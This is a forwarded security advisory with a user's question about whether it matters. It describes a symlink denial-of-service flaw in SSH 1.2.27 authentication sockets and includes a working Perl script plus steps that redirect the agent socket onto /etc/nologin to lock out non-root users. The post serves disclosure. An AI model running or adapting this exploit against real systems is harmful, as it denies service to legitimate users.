I recieved this email today and wanted to know if it is something to be of
concern about.
The following security advisory is sent to the securiteam mailing list, and
can be found at the SecuriTeam web site: http://www.securiteam.com
SSH 1.2.27 vulnerable to a Denial of Service attack
------------------------------------------------------------
SSH has the option of setting up "authentication sockets", used to pass
authentication keys securely. When this is used, a socket is created on both
client and server machines; the socket created on the server uses an easy to
guess filename (based on the PID). The creation of this socket is done while
the server is acting as root and follows symlinks.
******************************
Exploit:
- connect to remote machine
- run the following script (creates symlinks for the next 50 PID's):
----- cut -----
#!/usr/bin/perl
$pid = $$;
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);
for ($i = $pid; $i < $pid+50; $i++)
{
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
----- cut -----
- on local machine, execute ssh-agent1; it will produce a few lines to cut and paste
into your shell.
- ssh1 to the remote machine; enter password
The socket will have been created at /etc/nologin, preventing other non-root users
from logging in. This connection too will die with "Logins are currently denied by
/etc/nologin:"
This was tested on a RedHat 6.0 machine, with standard configure/make/install
installation of ssh. This script should work pretty well for systems that create
processes where each PID is one greater than the last; other platforms may require
modifications, or many-many more links, if they're exploitable.